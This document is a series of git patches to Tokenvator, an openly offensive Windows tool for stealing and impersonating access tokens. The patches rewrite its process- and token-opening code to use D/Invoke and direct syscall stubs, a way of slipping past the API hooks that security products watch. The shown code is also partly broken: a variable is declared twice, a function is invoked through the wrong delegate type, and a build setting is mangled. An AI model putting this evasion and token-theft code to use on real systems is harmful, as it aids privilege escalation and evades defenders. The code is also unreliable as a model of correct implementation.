From 3a57d2d260527a52ac854103d2d5ff7e1ff94107 Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Mon, 23 Aug 2021 10:55:43 -0500
Subject: [PATCH 01/36] Migrating to D/Invoke

---
 Tokenvator/MainLoop.Modules.cs                |  1 +
 Tokenvator/MainLoop.cs                        |  1 +
 .../Plugins/AccessTokens/AccessTokens.cs      | 25 ++++++++
 .../Plugins/AccessTokens/CreateTokens.cs      |  7 ++-
 .../Plugins/AccessTokens/RestrictedToken.cs   |  1 +
 .../Plugins/AccessTokens/TokenDriver.cs       |  1 +
 .../Plugins/AccessTokens/TokenInformation.cs  |  1 +
 .../Plugins/AccessTokens/TokenManipulation.cs |  1 +
 Tokenvator/Plugins/Enumeration/DesktopACL.cs  |  1 +
 .../Plugins/Enumeration/UserSessions.cs       |  1 +
 Tokenvator/Plugins/Execution/CreateProcess.cs |  7 +++
 Tokenvator/Plugins/Execution/PSExec.cs        |  1 +
 .../Plugins/MiniFilters/FilterInstance.cs     |  1 +
 Tokenvator/Plugins/MiniFilters/Filters.cs     |  1 +
 Tokenvator/Plugins/NamedPipes/NamedPipes.cs   |  1 +
 Tokenvator/Resources/Misc.cs                  |  1 +
 Tokenvator/Tokenvator.csproj                  | 60 +++++++++++++++----
 17 files changed, 97 insertions(+), 15 deletions(-)

diff --git a/Tokenvator/MainLoop.Modules.cs b/Tokenvator/MainLoop.Modules.cs
index d670049..75dfde0 100644
--- a/Tokenvator/MainLoop.Modules.cs
+++ b/Tokenvator/MainLoop.Modules.cs
@@ -17,6 +17,7 @@
 
 using MonkeyWorks.Unmanaged.Headers;
 using MonkeyWorks.Unmanaged.Libraries;
+
 using System.IO;
 
 namespace Tokenvator
diff --git a/Tokenvator/MainLoop.cs b/Tokenvator/MainLoop.cs
index 838c4eb..6c3f8c1 100644
--- a/Tokenvator/MainLoop.cs
+++ b/Tokenvator/MainLoop.cs
@@ -10,6 +10,7 @@
 using MonkeyWorks.Unmanaged.Headers;
 using MonkeyWorks.Unmanaged.Libraries;
 
+
 namespace Tokenvator
 {
     partial class MainLoop
diff --git a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
index 3996e9a..e972c3f 100644
--- a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
@@ -7,11 +7,17 @@
 
 using MonkeyWorks.Unmanaged.Headers;
 using MonkeyWorks.Unmanaged.Libraries;
+//using MonkeyWorks.Unmanaged.Libraries.DInvoke;
+
+using DInvoke.DynamicInvoke;
+
 using System.Runtime.InteropServices;
 using System.Diagnostics;
 
 namespace Tokenvator.Plugins.AccessTokens
 {
+    using MonkeyWorks = MonkeyWorks.Unmanaged.Libraries.DInvoke;
+
     class AccessTokens : IDisposable
     {
         protected IntPtr phNewToken;
@@ -97,6 +103,19 @@ public virtual bool OpenProcessToken(int processId)
             */
 
             IntPtr hProcess = kernel32.OpenProcess(ProcessThreadsApi.ProcessSecurityRights.PROCESS_QUERY_INFORMATION, false, (uint)processId);
+
+            Console.WriteLine("[D] Calling D/Invoke");
+            
+            IntPtr pkernel32 = Generic.GetPebLdrModuleEntry("kernel32.dll");
+            IntPtr pOpenProcess = Generic.GetExportAddress(pkernel32, "OpenProcess");
+            object[] parameters =
+            {
+                Winnt.PROCESS_QUERY_INFORMATION, false, (uint)processId
+            };
+
+            IntPtr hProcess = (IntPtr)Generic.DynamicFunctionInvoke(pOpenProcess, typeof(MonkeyWorks.kernel32.OpenProcess), ref parameters);
+            //IntPtr hProcess = kernel32.OpenProcess(Winnt.PROCESS_QUERY_INFORMATION, false, (uint)processId);
+
             if (IntPtr.Zero == hProcess)
             {
                 Misc.GetWin32Error("OpenProcess");
@@ -104,6 +123,12 @@ public virtual bool OpenProcessToken(int processId)
             }
             Console.WriteLine("[*] Recieved Process Handle 0x{0}", hProcess.ToString("X4"));
 
+            IntPtr pOpenProcessToken = Generic.GetExportAddress(pkernel32, "OpenProcessToken");
+            parameters = new object[]
+            {
+                hProcess, Winnt.TOKEN_ALL_ACCESS, hExistingToken
+            };
+
             if (!kernel32.OpenProcessToken(hProcess, Winnt.TOKEN_ALL_ACCESS, out hExistingToken))
             {
                 if (!kernel32.OpenProcessToken(hProcess, (uint)Winnt.ACCESS_MASK.MAXIMUM_ALLOWED, out hExistingToken))
diff --git a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
index f40cd24..0412860 100644
--- a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
@@ -9,6 +9,7 @@
 
 using MonkeyWorks.Unmanaged.Headers;
 using MonkeyWorks.Unmanaged.Libraries;
+
 using System.Security.Principal;
 
 namespace Tokenvator.Plugins.AccessTokens
@@ -38,8 +39,8 @@ public void CreateToken(string[] groups, string command)
                 return;
             }
 
-            uint LG_INCLUDE_INDIRECT = 0x0001;
-            uint MAX_PREFERRED_LENGTH = 0xFFFFFFFF;
+            //uint LG_INCLUDE_INDIRECT = 0x0001;
+            //uint MAX_PREFERRED_LENGTH = 0xFFFFFFFF;
 
             Console.WriteLine();
             Console.WriteLine("_SECURITY_QUALITY_OF_SERVICE");
@@ -124,7 +125,7 @@ public void CreateToken(string userName, string[] groups, string command)
                 return;
             }
             
-            uint MAX_PREFERRED_LENGTH = 0xFFFFFFFF;
+            //uint MAX_PREFERRED_LENGTH = 0xFFFFFFFF;
 
             #region _OBJECT_ATTRIBUTES
             Console.WriteLine();
diff --git a/Tokenvator/Plugins/AccessTokens/RestrictedToken.cs b/Tokenvator/Plugins/AccessTokens/RestrictedToken.cs
index d85a04c..42733da 100644
--- a/Tokenvator/Plugins/AccessTokens/RestrictedToken.cs
+++ b/Tokenvator/Plugins/AccessTokens/RestrictedToken.cs
@@ -8,6 +8,7 @@
 using MonkeyWorks.Unmanaged.Headers;
 using MonkeyWorks.Unmanaged.Libraries;
 
+
 namespace Tokenvator.Plugins.AccessTokens
 {
     class RestrictedToken : AccessTokens
diff --git a/Tokenvator/Plugins/AccessTokens/TokenDriver.cs b/Tokenvator/Plugins/AccessTokens/TokenDriver.cs
index 7eb0f8a..72ba29e 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenDriver.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenDriver.cs
@@ -10,6 +10,7 @@
 using MonkeyWorks.Unmanaged.Headers;
 using MonkeyWorks.Unmanaged.Libraries;
 
+
 namespace Tokenvator.Plugins.AccessTokens
 {
     class TokenDriver : IDisposable
diff --git a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
index 23f88fe..244ea3a 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
@@ -10,6 +10,7 @@
 using MonkeyWorks.Unmanaged.Headers;
 using MonkeyWorks.Unmanaged.Libraries;
 
+
 namespace Tokenvator.Plugins.AccessTokens
 {
     class TokenInformation : AccessTokens
diff --git a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
index d84bcc5..c6f0b2d 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
@@ -13,6 +13,7 @@
 using MonkeyWorks.Unmanaged.Headers;
 using MonkeyWorks.Unmanaged.Libraries;
 
+
 namespace Tokenvator.Plugins.AccessTokens
 {
     partial class TokenManipulation : AccessTokens
diff --git a/Tokenvator/Plugins/Enumeration/DesktopACL.cs b/Tokenvator/Plugins/Enumeration/DesktopACL.cs
index def27de..0587c2c 100644
--- a/Tokenvator/Plugins/Enumeration/DesktopACL.cs
+++ b/Tokenvator/Plugins/Enumeration/DesktopACL.cs
@@ -5,6 +5,7 @@
 using MonkeyWorks.Unmanaged.Headers;
 using MonkeyWorks.Unmanaged.Libraries;
 
+
 using Tokenvator.Plugins.AccessTokens;
 using Tokenvator.Resources;
 
diff --git a/Tokenvator/Plugins/Enumeration/UserSessions.cs b/Tokenvator/Plugins/Enumeration/UserSessions.cs
index a0a8c61..bf031f5 100644
--- a/Tokenvator/Plugins/Enumeration/UserSessions.cs
+++ b/Tokenvator/Plugins/Enumeration/UserSessions.cs
@@ -12,6 +12,7 @@
 using MonkeyWorks.Unmanaged.Headers;
 using MonkeyWorks.Unmanaged.Libraries;
 
+
 namespace Tokenvator.Plugins.Enumeration
 {
     class UserSessions
diff --git a/Tokenvator/Plugins/Execution/CreateProcess.cs b/Tokenvator/Plugins/Execution/CreateProcess.cs
index 06045e4..cb42428 100644
--- a/Tokenvator/Plugins/Execution/CreateProcess.cs
+++ b/Tokenvator/Plugins/Execution/CreateProcess.cs
@@ -4,6 +4,7 @@
 
 using Tokenvator.Resources;
 
+using DInvoke.DynamicInvoke;
 using MonkeyWorks.Unmanaged.Headers;
 using MonkeyWorks.Unmanaged.Libraries;
 
@@ -16,6 +17,12 @@ static class CreateProcess
         ////////////////////////////////////////////////////////////////////////////////
         public static bool CreateProcessWithLogonW(IntPtr phNewToken, string name, string arguments)
         {
+            IntPtr padvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+            IntPtr pImpersonateLoggedOnUser = Generic.GetExportAddress(padvapi32, "ImpersonateLoggedOnUser");
+            object[] paramaters = { phNewToken };
+            bool retVal = (bool)Generic.DynamicFunctionInvoke(pImpersonateLoggedOnUser, typeof(Win32.Delegates.OpenProcess), ref paramaters);
+
+
             if (IntPtr.Zero != phNewToken && !advapi32.ImpersonateLoggedOnUser(phNewToken))
             {
                 Console.WriteLine("[-] Token Impersonation Failed");
diff --git a/Tokenvator/Plugins/Execution/PSExec.cs b/Tokenvator/Plugins/Execution/PSExec.cs
index eae86d4..a15d6df 100644
--- a/Tokenvator/Plugins/Execution/PSExec.cs
+++ b/Tokenvator/Plugins/Execution/PSExec.cs
@@ -6,6 +6,7 @@
 using MonkeyWorks.Unmanaged.Headers;
 using MonkeyWorks.Unmanaged.Libraries;
 
+
 using Tokenvator.Resources;
 
 namespace Tokenvator.Plugins.Execution
diff --git a/Tokenvator/Plugins/MiniFilters/FilterInstance.cs b/Tokenvator/Plugins/MiniFilters/FilterInstance.cs
index b081650..1d2f7ad 100644
--- a/Tokenvator/Plugins/MiniFilters/FilterInstance.cs
+++ b/Tokenvator/Plugins/MiniFilters/FilterInstance.cs
@@ -4,6 +4,7 @@
 using MonkeyWorks.Unmanaged.Headers;
 using MonkeyWorks.Unmanaged.Libraries;
 
+
 namespace Tokenvator.Plugins.MiniFilters
 {
     class FilterInstance : Filters
diff --git a/Tokenvator/Plugins/MiniFilters/Filters.cs b/Tokenvator/Plugins/MiniFilters/Filters.cs
index 87685c2..a6d851c 100644
--- a/Tokenvator/Plugins/MiniFilters/Filters.cs
+++ b/Tokenvator/Plugins/MiniFilters/Filters.cs
@@ -4,6 +4,7 @@
 using MonkeyWorks.Unmanaged.Headers;
 using MonkeyWorks.Unmanaged.Libraries;
 
+
 using Tokenvator.Resources;
 
 namespace Tokenvator.Plugins.MiniFilters
diff --git a/Tokenvator/Plugins/NamedPipes/NamedPipes.cs b/Tokenvator/Plugins/NamedPipes/NamedPipes.cs
index c0be358..2a247cd 100644
--- a/Tokenvator/Plugins/NamedPipes/NamedPipes.cs
+++ b/Tokenvator/Plugins/NamedPipes/NamedPipes.cs
@@ -11,6 +11,7 @@
 using MonkeyWorks.Unmanaged.Headers;
 using MonkeyWorks.Unmanaged.Libraries;
 
+
 namespace Tokenvator.Plugins.NamedPipes
 {
     class NamedPipes
diff --git a/Tokenvator/Resources/Misc.cs b/Tokenvator/Resources/Misc.cs
index be5de5f..00e96c8 100644
--- a/Tokenvator/Resources/Misc.cs
+++ b/Tokenvator/Resources/Misc.cs
@@ -3,6 +3,7 @@
 using System.Linq;
 
 using MonkeyWorks.Unmanaged.Libraries;
+
 using Tokenvator.Plugins.Execution;
 
 namespace Tokenvator.Resources
diff --git a/Tokenvator/Tokenvator.csproj b/Tokenvator/Tokenvator.csproj
index a3d4f18..4db4bef 100644
--- a/Tokenvator/Tokenvator.csproj
+++ b/Tokenvator/Tokenvator.csproj
@@ -142,6 +142,19 @@
     <Compile Include="MainLoop.cs" />
     <Compile Include="MainLoop.Modules.cs" />
     <Compile Include="Resources\CommandLineParsing.cs" />
+    <Compile Include="Resources\DInvoke\DInvoke\DInvoke\DynamicInvoke\Generic.cs" />
+    <Compile Include="Resources\DInvoke\DInvoke\DInvoke\DynamicInvoke\Native.cs" />
+    <Compile Include="Resources\DInvoke\DInvoke\DInvoke\DynamicInvoke\Win32.cs" />
+    <Compile Include="Resources\DInvoke\DInvoke\DInvoke\Injection\Allocation.cs" />
+    <Compile Include="Resources\DInvoke\DInvoke\DInvoke\Injection\Execution.cs" />
+    <Compile Include="Resources\DInvoke\DInvoke\DInvoke\Injection\Injector.cs" />
+    <Compile Include="Resources\DInvoke\DInvoke\DInvoke\Injection\Payload.cs" />
+    <Compile Include="Resources\DInvoke\DInvoke\DInvoke\ManualMap\Map.cs" />
+    <Compile Include="Resources\DInvoke\DInvoke\DInvoke\ManualMap\Overload.cs" />
+    <Compile Include="Resources\DInvoke\DInvoke\DInvoke\SharedData\Native.cs" />
+    <Compile Include="Resources\DInvoke\DInvoke\DInvoke\SharedData\PE.cs" />
+    <Compile Include="Resources\DInvoke\DInvoke\DInvoke\SharedData\Win32.cs" />
+    <Compile Include="Resources\DInvoke\DInvoke\DInvoke\SharedUtilities\Utilities.cs" />
     <Compile Include="Resources\Misc.cs" />
     <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Headers\Accctrl.cs" />
     <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Headers\lmaccess.cs" />
@@ -172,18 +185,6 @@
     <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Headers\Winternl.cs" />
     <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Headers\Winuser.cs" />
     <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Headers\wudfwdm.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\advapi32.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\crypt32.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\dbghelp.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\fltlib.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\kernel32.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\netapi32.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\ntdll.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\secur32.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\user32.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\vaultcli.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\wlanapi.cs" />
-    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\wtsapi32.cs" />
     <Compile Include="Plugins\Execution\PSExec.cs" />
     <Compile Include="Plugins\AccessTokens\RestrictedToken.cs" />
     <Compile Include="Plugins\Execution\Services.cs" />
@@ -191,6 +192,30 @@
     <Compile Include="Plugins\AccessTokens\TokenManipulation.cs" />
   </ItemGroup>
   <ItemGroup>
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\DInvoke\advapi32.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\DInvoke\crypt32.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\DInvoke\dbghelp.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\DInvoke\fltlib.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\DInvoke\kernel32.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\DInvoke\netapi32.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\DInvoke\ntdll.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\DInvoke\secur32.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\DInvoke\user32.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\DInvoke\vaultcli.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\DInvoke\wlanapi.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\DInvoke\wtsapi32.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\advapi32.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\crypt32.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\dbghelp.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\fltlib.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\kernel32.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\netapi32.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\ntdll.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\secur32.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\user32.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\vaultcli.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\wlanapi.cs" />
+    <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Libraries\PInvoke\wtsapi32.cs" />
     <Compile Include="Resources\TabComplete.cs" />
   </ItemGroup>
   <ItemGroup>
@@ -198,9 +223,17 @@
       <Link>.editorconfig</Link>
     </None>
     <None Include="app.config" />
+    <None Include="Resources\DInvoke\.github\workflows\DInvoke.NetFramework.CI.Package.yml" />
+    <None Include="Resources\DInvoke\.github\workflows\DInvoke.NetFramework.CI.yml" />
+    <None Include="Resources\DInvoke\DInvoke\DInvoke\obj\Debug\DesignTimeResolveAssemblyReferencesInput.cache" />
+    <None Include="Resources\DInvoke\DInvoke\DInvoke\obj\Debug\DInvoke.csprojAssemblyReference.cache" />
+    <None Include="Resources\DInvoke\LICENSE" />
+    <None Include="Resources\DInvoke\README.md" />
   </ItemGroup>
   <ItemGroup>
     <Folder Include="Plugins\Ownership\" />
+    <Folder Include="Resources\DInvoke\DInvoke\DInvoke\obj\Debug\TempPE\" />
+    <Folder Include="Resources\DInvoke\DInvoke\DInvoke\Properties\" />
   </ItemGroup>
   <ItemGroup>
     <BootstrapperPackage Include="Microsoft.Net.Framework.3.5.SP1">
@@ -209,6 +242,9 @@
       <Install>false</Install>
     </BootstrapperPackage>
   </ItemGroup>
+  <ItemGroup>
+    <Content Include="Resources\DInvoke\.gitignore" />
+  </ItemGroup>
   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
   <!-- To modify your build process, add your task inside one of the targets below and uncomment it. 
        Other similar extension points exist, see Microsoft.Common.targets.

From 1f85a40d3f91bfafb5698cb3372def32d0af6b61 Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Wed, 25 Aug 2021 08:44:13 -0500
Subject: [PATCH 02/36] Updated to use SysCalls and handle Corrupted State
 Exceptions

---
 .../Plugins/AccessTokens/AccessTokens.cs      | 107 +++++++++++++-----
 Tokenvator/Tokenvator.csproj                  |   4 +-
 2 files changed, 79 insertions(+), 32 deletions(-)

diff --git a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
index e972c3f..72e8672 100644
--- a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
@@ -13,6 +13,8 @@
 
 using System.Runtime.InteropServices;
 using System.Diagnostics;
+using System.Runtime.ExceptionServices;
+using System.Security;
 
 namespace Tokenvator.Plugins.AccessTokens
 {
@@ -88,59 +90,89 @@ public IntPtr GetWorkingToken()
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Sets hToken to a processes primary token
+        // Opens a process Token
+        // Converted to Dinvoke Syscalls
         ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         public virtual bool OpenProcessToken(int processId)
         {
-            /*
-            WindowsPrincipal windowsPrincipal = new WindowsPrincipal(WindowsIdentity.GetCurrent());
-            if (!windowsPrincipal.IsInRole(WindowsBuiltInRole.Administrator)
-                && !windowsPrincipal.IsInRole(WindowsBuiltInRole.SystemOperator))
+            ////////////////////////////////////////////////////////////////////////////////
+            // Open a limited handle to the process via a syscall stub
+            // IntPtr hProcess = kernel32.OpenProcess(ProcessThreadsApi.ProcessSecurityRights.PROCESS_QUERY_INFORMATION, false, (uint)processId);
+            ////////////////////////////////////////////////////////////////////////////////
+
+            IntPtr hNtOpenProcess = Generic.GetSyscallStub("NtOpenProcess");
+            MonkeyWorks.ntdll.NtOpenProcess fSyscallNtOpenProcess = (MonkeyWorks.ntdll.NtOpenProcess)Marshal.GetDelegateForFunctionPointer(hNtOpenProcess, typeof(MonkeyWorks.ntdll.NtOpenProcess));
+
+            IntPtr hProcess = new IntPtr();
+            MonkeyWorks.ntdll.OBJECT_ATTRIBUTES objectAttributes = new MonkeyWorks.ntdll.OBJECT_ATTRIBUTES();
+            MonkeyWorks.ntdll.CLIENT_ID clientId = new MonkeyWorks.ntdll.CLIENT_ID();
+            clientId.UniqueProcess = new IntPtr(processId);
+
+            uint ntRetVal = 0;
+            try
             {
-                Console.WriteLine("[-] Administrator privileges required");
+                ntRetVal = fSyscallNtOpenProcess(ref hProcess, ProcessThreadsApi.ProcessSecurityRights.PROCESS_QUERY_INFORMATION, ref objectAttributes, ref clientId);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] NtOpenProcess Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
                 return false;
             }
-            */
 
-            IntPtr hProcess = kernel32.OpenProcess(ProcessThreadsApi.ProcessSecurityRights.PROCESS_QUERY_INFORMATION, false, (uint)processId);
-
-            Console.WriteLine("[D] Calling D/Invoke");
-            
-            IntPtr pkernel32 = Generic.GetPebLdrModuleEntry("kernel32.dll");
-            IntPtr pOpenProcess = Generic.GetExportAddress(pkernel32, "OpenProcess");
-            object[] parameters =
+            if (0 != ntRetVal)
             {
-                Winnt.PROCESS_QUERY_INFORMATION, false, (uint)processId
-            };
+                Misc.GetNtError("NtOpenProcess", ntRetVal);
+                return false;
+            }
+            Console.WriteLine("[*] Recieved Process Handle 0x{0}", hProcess.ToString("X4"));
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // Open a handle to the process token
+            // bool retVal = kernel32.OpenProcessToken(hProcess, (ulong)Winnt.TOKEN_ALL_ACCESS, out hExistingToken)
+            ////////////////////////////////////////////////////////////////////////////////
 
-            IntPtr hProcess = (IntPtr)Generic.DynamicFunctionInvoke(pOpenProcess, typeof(MonkeyWorks.kernel32.OpenProcess), ref parameters);
-            //IntPtr hProcess = kernel32.OpenProcess(Winnt.PROCESS_QUERY_INFORMATION, false, (uint)processId);
+            IntPtr hNtOpenProcessToken = Generic.GetSyscallStub("NtOpenProcessToken");
+            MonkeyWorks.ntdll.NtOpenProcessToken fSyscallNtOpenProcessToken = (MonkeyWorks.ntdll.NtOpenProcessToken)Marshal.GetDelegateForFunctionPointer(hNtOpenProcessToken, typeof(MonkeyWorks.ntdll.NtOpenProcessToken));
 
-            if (IntPtr.Zero == hProcess)
+            try
+            {
+                ntRetVal = fSyscallNtOpenProcessToken(hProcess, Winnt.TOKEN_ALL_ACCESS, ref hExistingToken);
+            }
+            catch (Exception ex)
             {
-                Misc.GetWin32Error("OpenProcess");
+                Console.WriteLine("[-] NtOpenProcessToken Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
                 return false;
             }
-            Console.WriteLine("[*] Recieved Process Handle 0x{0}", hProcess.ToString("X4"));
 
-            IntPtr pOpenProcessToken = Generic.GetExportAddress(pkernel32, "OpenProcessToken");
-            parameters = new object[]
+            if (0 != ntRetVal)
             {
-                hProcess, Winnt.TOKEN_ALL_ACCESS, hExistingToken
-            };
+                Misc.GetNtError("NtOpenProcessToken", ntRetVal);
 
-            if (!kernel32.OpenProcessToken(hProcess, Winnt.TOKEN_ALL_ACCESS, out hExistingToken))
-            {
-                if (!kernel32.OpenProcessToken(hProcess, (uint)Winnt.ACCESS_MASK.MAXIMUM_ALLOWED, out hExistingToken))
+                try
+                {
+                    ntRetVal = fSyscallNtOpenProcessToken(hProcess, (uint)Winnt.ACCESS_MASK.MAXIMUM_ALLOWED, ref hExistingToken);
+                }
+                catch (Exception ex)
+                {
+                    Console.WriteLine("[-] NtOpenProcessToken Generated an Exception");
+                    Console.WriteLine("[-] {0}", ex.Message);
+                    return false;
+                }
+
+                if (0 != ntRetVal)
                 {
                     Console.WriteLine(" [-] Unable to Open Process Token");
-                    Misc.GetWin32Error("OpenProcessToken");
-                    kernel32.CloseHandle(hProcess);
+                    Misc.GetNtError("NtOpenProcessToken", ntRetVal);
+                    CloseHandle(hProcess);
                     return false;
                 }
             }
             Console.WriteLine("[*] Recieved Token Handle 0x{0}", hExistingToken.ToString("X4"));
-            kernel32.CloseHandle(hProcess);
+            CloseHandle(hProcess);
             return true;
         }
 
@@ -260,6 +292,19 @@ out phNewToken
             return true;
         }
 
+        protected bool CloseHandle(IntPtr handle)
+        {
+            IntPtr hNtClose = Generic.GetSyscallStub("NtClose");
+            MonkeyWorks.ntdll.NtClose fSyscallhNtClose = (MonkeyWorks.ntdll.NtClose)Marshal.GetDelegateForFunctionPointer(hNtClose, typeof(MonkeyWorks.ntdll.NtClose));
+            uint ntRetVal = fSyscallhNtClose(handle);
+            if (0 != ntRetVal)
+            {
+                Misc.GetNtError("NtClose", ntRetVal);
+                return false;
+            }
+            return true;
+        }
+
         ~AccessTokens()
         {
 
diff --git a/Tokenvator/Tokenvator.csproj b/Tokenvator/Tokenvator.csproj
index 4db4bef..2c24704 100644
--- a/Tokenvator/Tokenvator.csproj
+++ b/Tokenvator/Tokenvator.csproj
@@ -1,7 +1,9 @@
 <?xml version="1.0" encoding="utf-8"?>
 <Project ToolsVersion="15.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
   <PropertyGroup>
-    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Configuration Condition=" '$(Configuration)' == '' ">
+		<legacyCorruptedStateExceptionsPolicy enabled="true"/>  
+	</Configuration>
     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
     <ProductVersion>9.0.30729</ProductVersion>
     <SchemaVersion>2.0</SchemaVersion>

From d936ecffd49a80ec3705062587241518308b2e24 Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Wed, 25 Aug 2021 11:16:27 -0500
Subject: [PATCH 03/36] Converted ImpersonateUser to Syscalls

---
 .../Plugins/AccessTokens/AccessTokens.cs      | 149 +++++++++++++++---
 .../Plugins/AccessTokens/TokenManipulation.cs |   1 +
 2 files changed, 125 insertions(+), 25 deletions(-)

diff --git a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
index 72e8672..488c376 100644
--- a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
@@ -22,6 +22,8 @@ namespace Tokenvator.Plugins.AccessTokens
 
     class AccessTokens : IDisposable
     {
+        private bool Disposed = false;
+
         protected IntPtr phNewToken;
         protected IntPtr hExistingToken;
         protected IntPtr currentProcessToken;
@@ -43,6 +45,7 @@ public AccessTokens(IntPtr currentProcessToken)
             hWorkingThreadToken = new IntPtr();
         }
 
+        #region Get/Set
         ////////////////////////////////////////////////////////////////////////////////
         // Sets hWorkingToken to currentProcessToken
         ////////////////////////////////////////////////////////////////////////////////
@@ -88,11 +91,14 @@ public IntPtr GetWorkingToken()
         {
             return hWorkingToken;
         }
-
-        ////////////////////////////////////////////////////////////////////////////////
-        // Opens a process Token
-        // Converted to Dinvoke Syscalls
-        ////////////////////////////////////////////////////////////////////////////////
+        #endregion
+
+        /// <summary>
+        /// Opens a process Token
+        /// Converted to Dinvoke Syscalls 
+        /// </summary>
+        /// <param name="processId"></param>
+        /// <returns></returns>
         [SecurityCritical]
         [HandleProcessCorruptedStateExceptions]
         public virtual bool OpenProcessToken(int processId)
